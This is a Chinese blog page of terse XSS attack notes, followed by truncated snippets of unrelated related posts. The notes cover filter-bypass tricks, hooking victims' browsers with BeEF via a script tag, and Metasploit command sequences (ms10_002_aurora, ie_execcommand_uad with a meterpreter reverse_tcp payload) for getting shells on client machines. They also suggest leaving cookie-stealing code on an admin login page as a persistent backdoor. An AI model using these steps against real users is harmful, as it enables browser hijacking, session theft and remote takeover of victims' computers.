2. 程式人生 > >網絡安全-XSS筆記

網絡安全-XSS筆記

阿新 發佈:2018-07-12
掃描工具 char ret option rip htm console set exp

XSS繞過限制:
1、繞過magic_quotes_gpc
可使用javascript中的String.fromCharCode()
<script>String.fromCharCode()</scrip>
2、HEX編碼
十六進制編碼
https://textmechanic.com/ASCII-Hex-Unicode-Base64-Convertor.html
https://www.asciitohex.com/
3、改變大小寫
4、關閉標簽
5、AWVS 掃描

Kali Linux Beef劫持客戶端瀏覽器:
cd /usr/share/beef-xss 進入目錄
ls 查看目錄
./beef 運行beef

UI URL:管理 網址瀏覽器打開 賬號密碼默認beef
Hook URL: 惡意代碼
使用:
<script src="Hook URL"></script>
管理端 Commands Redirect Browser

beef+msf拿客戶端shell (ie6 xp)
cd /usr/share/beef-xss 進入目錄
./ beef 運行beef
msfconsole 運行msf

msf下執行:
use windows/browser/ms10_002_aurora
set PAYLOAD windows/meterpreter/reverse_tcp
show options

set SRVHOST 客戶端將要訪問的IP
set SRVPORT 將要訪問的端口
set URIPATH / 網站根目錄
set LHOST 客戶端回連IP
set LPORT 客戶端回連端口
exploit

Using URL 為要讓客戶端訪問的url,beef裏設置

session -i 查看得到的shell
session -1 id 查看固定id的shell

shell 拿到權限

beef+msf拿客戶端shell (ie7、8、9)
msf下
use exploit/windows/browser/ie_execcommand_uad
show options
set SRVHOST 回連ip
set SRVPORT 回連端口

set URIPATH /
exploit

XSS漏洞掃描工具
WVS
椰樹
safe3
Xelenium
w3af
vega
xss掃描插件+burp

長期留後門,可將XSS獲取cookie代碼留在管理登錄頁面

Xss平臺搭建
使用工具:
wamp2.2+xss.me源碼

網絡安全-XSS筆記

相關推薦

安全-XSS筆記

掃描工具 char ret option rip htm console set exp XSS繞過限制:1、繞過magic_quotes_gpc可使用javascript中的String.fromCharCode() <script>String.fromCh

kali系統——安全v6筆記總結(一)

堅持 pen 掃描 回溯 自己 是你 定義 bili 自主 kali:(Kali Linux)是一個***測試,安全審計(Security Auditing)平臺,繼承了多款漏洞檢測,安全掃描,漏洞利用等安全工具。基於Linux操作系統——Debian,前身為Back Tr

kali系統——安全v6筆記總結(二)

方法 upd set udp tar 發現 lsof sources 安裝 1、kali的SSH配置與使用SSH——安全的shell,常用於遠程連接 【服務端口】tcp/22 在kali中SSH默認不開啟netstat -tnlp | grep":22&qu

kali系統——安全v6筆記總結(三)

ado 我們 bcf sha 網絡安全 ef6 筆記 proc oss kali系統利用ms12-020漏洞***測試1、首先我們要準備一個windos7系統的虛擬機,打開系統開啟3389端口,並啟動共享。2、打開工具Metasploit,第一次啟動最好用圖形化方式,之後可

kali系統——安全v6筆記總結(四)

輸入 tco com -o bcb 用戶 b2c img 結束 利用永恒之藍漏洞實現w7遠程操控首先目標要關閉防火墻然後打開Metasploit輸入永恒之藍漏洞編碼復制運行第二條輔助項目設置漏洞選項運行項目,結果為有一個可能是漏洞的w7漏洞然後選擇第三個項目,即***項目,

kali系統——安全v6筆記總結(五)

計算 弱點 軟件 很多 cve 用戶 經歷 後綴名 挖礦病毒 勒索病毒——GandCrad於2018年1月面世,在短短幾個月經歷三次快速叠代,現有GandCrad v1、GandCrad v2、GandCrad v3三個版本。GandCrad v3使用CVE——2017——

kali系統——安全v6筆記總結(七)

解密 不同的 兩種 一個 kali系統 安全 快速 由於 對稱 對稱非對稱及混合加密對稱式加密:對稱是加密是指加密方用一個密鑰加密然後把加密內容和密鑰用網絡發送給解密方,然後解密方直接用收到的密鑰解密這是一種最快速、最簡單的加密方式,加密與解密用的是同樣的密鑰所以也稱為單密

kali系統——安全v6筆記總結(八)

輸入 hash算法 2個 免費開源 md5算法 md5 通信 設計 權限 PGPPGP是一個基於RSA公鑰加密的郵件加密軟件。它可以用來對郵件保護以避免非法權限者閱讀。還可以對郵件加上數字簽名從而使收信人確信郵件是你發來的,他讓你可以安全的和網絡上的人通信,而事先不需以任何

安全基礎之筆記二(傳輸層安全

一個 keys 字符串交換 web安全 恢復 xinit images 流量 分享 web安全威脅 web流量安全方法 SSL 兩層協議組成。會話通過握手協議創建。 會話狀態:會話標識符、對等證書、壓縮方法、密碼規格、主密鑰(C/S共享的48字節的會話密鑰)、可

安全基礎之筆記三(電子郵件安全/IPSec)

標準 span tip 層次 標識 font 數字簽名 img logs PGP(Pretty Good Privacy) 數字簽名——認證 加密算法——保密性 ZIP算法——壓縮 base64轉換——兼容性 ——分段 集成了建立公鑰

安全統計顯示XSS和過時的軟件是主要問題

log div tps sql註入 網絡安全 掃描 最佳實踐 pre RKE   Netsparker剛剛發布了一些匿名的Web安全統計數據,這些統計數據是關於他們的在線解決方案在過去3年中在其用戶的Web應用程序和Web服務上發現的安全漏洞。    這些基於

安全與管理精講視頻筆記3-PGP郵件系統加密及實驗

cancel 菜單 express keys p地址 private dmi wan 類型 第一章 第三節?PGP郵件系統加密及實驗 ?PGP(Pretty Good Privacy)機制:??發送方甲:甲的私鑰+消息文摘->簽名,簽名+郵件內容+乙的公鑰->加

安全與管理精講視頻筆記4-數字信封、數字簽名、完整性驗證、數據加解密及身份認證流程

工具 發送 認證 ems str 結合 一個 驗證 過程 第二章 ?數字信封、數字簽名、完整性驗證、數據加解密及身份認證流程 數字信封:將對稱加密技術和非對稱加密技術結合使用的過程。數字簽名:驗證發送方的身份,發送方用自己的私鑰簽名,接收方用發送方的公鑰驗證。完整性驗證:H

安全與管理精講視頻筆記9-Windows傳輸模式IPSec配置實驗演示

源地址 加密 window 3des md5 協議 篩選 sha1 驗證方法 第四章 第二節?Windows傳輸模式IPSec配置實驗演示   配置Windows IPSec:  (1)新建IPSec:開始--管理工具--本地安全策略

安全與管理精講視頻筆記10-Windows隧道模式IPSec配置實驗演示

屬性 第四章 新建 設置 3des 管理工具 sha IPSec配置 不支持 第四章 第三節?Windows隧道模式IPSec配置實驗演示   配置Windows IPSec:  (1)新建IPSec:開始--管理工具--本地安全策略

安全與管理精講視頻筆記8-IPSec工作原理

建立 其他 kmp 計算 序列號 缺點 iat 進行 發出 第四章 第一節?IPSec工作原理     網絡層安全性,優點:密鑰協商的開銷大大消減、需改動的應用程序很少,很容易構建×××。缺點:很難解決抗抵賴之類問題。 &e

2016危及安全域名多達22萬

target 域名 惡意軟件 home 知識 組織 移動互聯 2016年 (六) 根據國家互聯網應急中心發布的《2016年我國互聯網網絡安全態勢綜述》,2016全球頂級域名申請總數達到近3.293億個。2016年國家互聯網應急中心捕獲移動互聯網惡意程序數量近205萬個,較2

比特幣病毒事件是否證明中國安全不堪一擊?

比特幣病毒事件是否證明中國網絡安全不堪一擊?先簡單聊聊這兩天比特幣事件:時間:2017-05-12 08:00起風險:電腦只要聯網,有445端口隱患,就有可能中比特幣病毒,然後數據被加密,勒索不少錢財。影響範圍:Windows ALL。(微軟甚至最後連xp 2003都更新了補丁)處理方式:斷網數據備份,防火墻

    華為 ACL 安全

華為acl網絡安全 華為ACL網絡安全 一. 1.物理層安全 墻上的不同的網線接口 連接交換機的端口關系; 2.數據鏈路層安全 ADSL撥號賬號和密碼 mac地址綁定 交換機端口連接計算機數量創建vlan; 3.網絡層安全 基於源IP地址 目標IP地址控制; 4.傳輸層

安全分析和公有雲使用的安全性

路由器 應用程序 網絡安全 黑客入侵 超級計算機 樓主從一個故事講起,讓我想起之前超級計算機被入侵的事情。首先網絡安全一直不是一件簡單事情,而且大家對黑客入侵一直抱有神秘未知的認知。我們可以把復雜的事情進行拆解分析,首先入侵面我們可以分為OSI七層,自下而上分別是:物理層、數據鏈路層、網絡